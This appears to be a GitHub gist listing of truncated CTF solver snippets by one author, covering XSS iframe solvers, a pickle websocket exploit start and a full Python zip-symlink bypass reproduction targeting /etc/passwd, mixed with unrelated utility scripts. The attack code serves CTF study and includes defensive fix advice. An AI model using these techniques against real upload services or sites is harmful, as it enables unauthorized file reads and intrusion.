@tyage
tyage / xss.html
Created June 29, 2024 05:16
Google CTF 2024 Game Arcade solver
<body>
<iframe id="frame1"></iframe>
<iframe id="frame2"></iframe>
<script>
function arrayToBase36(arr) {
return arr
.reduce((a, b) => BigInt(256) * a + BigInt(b), BigInt(0))
.toString(36);
}
@tyage
tyage / main.js
Last active June 29, 2024 05:16
Google CTF 2024 PostViewer v3 solver
// Locate this file in https://storage.googleapis.com
const evaluatorHtml = `
<html>
<head>
<meta charset="utf-8">
<title>Evaluator</title>
<script>
onmessage = e => {
from http.server import HTTPServer
from http.server import BaseHTTPRequestHandler
import requests
import sys
import re
import base64
import websocket
import time
import threading
import json
// Scrape the rows of a card-statement table (#meisaiTable) into tab-separated lines
// (date, description, empty column, card name, amount) for pasting into a spreadsheet.
const meisai = [...document.querySelectorAll('#meisaiTable tbody tr')]
  .filter(tr => tr.id === '')                     // keep only plain data rows (rows with an id are header/summary rows)
  .map(tr => [...tr.querySelectorAll('td')])
  .map(tds => {
    const date = tds[1].textContent
    const content = tds[2].textContent
    const price = tds[7].textContent.replaceAll(/\s/gi, '')   // strip whitespace from the amount cell
    return `${date}\t${content}\t\tクレジットカード:ANAゴールドカード\t${price}`
  })
  .join('\n')

zipviewer-version-citizen

To solve the challenge we need to upload a zip file containing a symlink entry.

When we upload the zip file, it is unzipped and any symlink inside it is then deleted. But if the entry name contains ../, the symlink is not deleted.

Therefore we create a symlink entry named foo/../bar in the zip file.
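A worked reproduction of the bypass described above, added here as an example and not part of the gist or of the challenge's code (which is not on this page). It builds a zip whose only member is a symlink using Python's zipfile, extracts it with a small extractor that normalizes entry names, and then runs a cleanup that looks the symlink up by its raw entry name. The extractor, the cleanup, the link target /etc/passwd and the assumption that the cleanup keys on the raw entry name are all constructed for the demonstration.

```python
import io
import os
import posixpath
import stat
import tempfile
import zipfile


def build_symlink_zip(entry_name: str, target: str) -> bytes:
    """Build a zip archive whose only entry is a symlink entry_name -> target."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zi = zipfile.ZipInfo(entry_name)  # zipfile does not strip ".." components here
        zi.create_system = 3              # 3 = Unix, so external_attr carries st_mode
        # The high 16 bits of external_attr hold the Unix mode; S_IFLNK marks a symlink.
        zi.external_attr = (stat.S_IFLNK | 0o777) << 16
        # For a symlink entry the member data is the link target path.
        zf.writestr(zi, target)
    return buf.getvalue()


def is_symlink_entry(zi: zipfile.ZipInfo) -> bool:
    return stat.S_ISLNK(zi.external_attr >> 16)


def extract_preserving_symlinks(zip_bytes: bytes, dest: str) -> list:
    """Constructed extractor: normalizes entry names and recreates symlinks on disk."""
    created = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for zi in zf.infolist():
            rel = posixpath.normpath(zi.filename)  # "foo/../bar" -> "bar"
            if posixpath.isabs(rel) or rel == ".." or rel.startswith("../"):
                raise ValueError(f"refusing to extract outside dest: {zi.filename}")
            path = os.path.join(dest, *rel.split("/"))
            os.makedirs(os.path.dirname(path), exist_ok=True)
            data = zf.read(zi)
            if is_symlink_entry(zi):
                os.symlink(data.decode(), path)
            else:
                with open(path, "wb") as f:
                    f.write(data)
            created.append(path)
    return created


def naive_symlink_cleanup(zip_bytes: bytes, dest: str) -> list:
    """Constructed cleanup (the assumed weak spot): deletes symlinks by raw entry name."""
    removed = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for zi in zf.infolist():
            candidate = os.path.join(dest, zi.filename)
            # For "dest/foo/../bar" the kernel resolves "foo" first; it was never
            # created, so lstat fails with ENOENT and islink() returns False.
            if os.path.islink(candidate):
                os.unlink(candidate)
                removed.append(candidate)
    return removed


def symlink_survives(entry_name: str) -> bool:
    """Extract, run the cleanup, and report whether the symlink is still on disk."""
    with tempfile.TemporaryDirectory() as dest:
        archive = build_symlink_zip(entry_name, "/etc/passwd")  # constructed target
        extract_preserving_symlinks(archive, dest)
        naive_symlink_cleanup(archive, dest)
        return os.path.islink(os.path.join(dest, "bar"))


if __name__ == "__main__":
    print("bar        survives cleanup:", symlink_survives("bar"))         # False
    print("foo/../bar survives cleanup:", symlink_survives("foo/../bar"))  # True
```

Run it on Linux (symlink creation needs no privilege there). The mismatch is that the extractor and the cleanup disagree on what `foo/../bar` names: the fix on the defending side is to normalize the entry name the same way before the cleanup, or better, to walk the extracted tree with os.lstat and remove every symlink found rather than trusting names from the archive.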

@tyage
tyage / obelix-template.yml
Created September 3, 2023 05:37
Midnight Sun CTF 2023 Finals - Web Obelix
AWSTemplateFormatVersion: 2010-09-09
Description: A kick-ass cloud app for hacker movienights!
Parameters:
AppName:
Type: String
Default: api-movies
Description: Name of application.
StageName:
Type: String
Default: prod
<body>
<script>
const sleep = (time) => new Promise((resolve) => setTimeout(resolve, time))
const frame = document.createElement('iframe');
frame.src = `https://sbx-hoge.postviewer2-web.2023.ctfcompetition.com/shim.html?o=${encodeURIComponent(location.origin)}`;
document.body.appendChild(frame);
const frame2 = document.createElement('iframe');
frame2.src = `https://sbx-hoge.postviewer2-web.2023.ctfcompetition.com/shim.html?o=${encodeURIComponent(location.origin)}`;
frame2.setAttribute('sandbox', 'allow-downloads allow-downloads-without-user-activation allow-forms allow-modals allow-orientation-lock allow-pointer-lock allow-popups allow-popups-to-escape-sandbox allow-presentation allow-same-origin allow-scripts allow-storage-access-by-user-activation allow-top-navigation allow-top-navigation-to-custom-protocols')
from websocket import create_connection
from base64 import b64encode, b64decode
import pickle
ticket = 'ticket{}'
ws = create_connection("ws://localhost:8081/ws/", subprotocols=[ticket])
PICKLE_OP_NAMES = {
"MARK": '(',
@tyage
tyage / autoql.sh
Last active January 12, 2023 08:26
Automatically analyze generated codeql db
#!/usr/bin/env bash
# Usage: ./autoql.sh owner/repo
# Clones the repository, downloads the CodeQL database GitHub generated for it
# (JavaScript) and runs the standard JavaScript query suite, writing SARIF output.
set -euo pipefail
REPO=${1:?usage: $0 owner/repo}
REPO_DIR="repos/$REPO/"
rm -rf "$REPO_DIR"
mkdir -p "$REPO_DIR"
cd "$REPO_DIR"
git clone --depth 1 "https://github.com/$REPO"
curl "https://api.github.com/repos/$REPO/code-scanning/codeql/databases/javascript" -H "accept: application/zip" -L -o codeqldb.zip
unzip -q codeqldb.zip
codeql database analyze ./javascript codeql/javascript-queries --format=sarif-latest --output=codeql.sarif --download
@tyage
tyage / solve.html
Last active December 12, 2021 05:56
x-note
<script>
chars = '_0123456789abcdefghijklmnopqrstuvwxyz'.split('')
//chars = '_012345678'.split('')
//chars = '9abcdefgh'.split('')
//chars = 'ijklmnopq'.split('')
//chars = 'rstuvwxyz}'.split('')
let prefix = 'SECCON{'
for (let char of chars) {
setTimeout(() => {
let trial = `${prefix}${char}`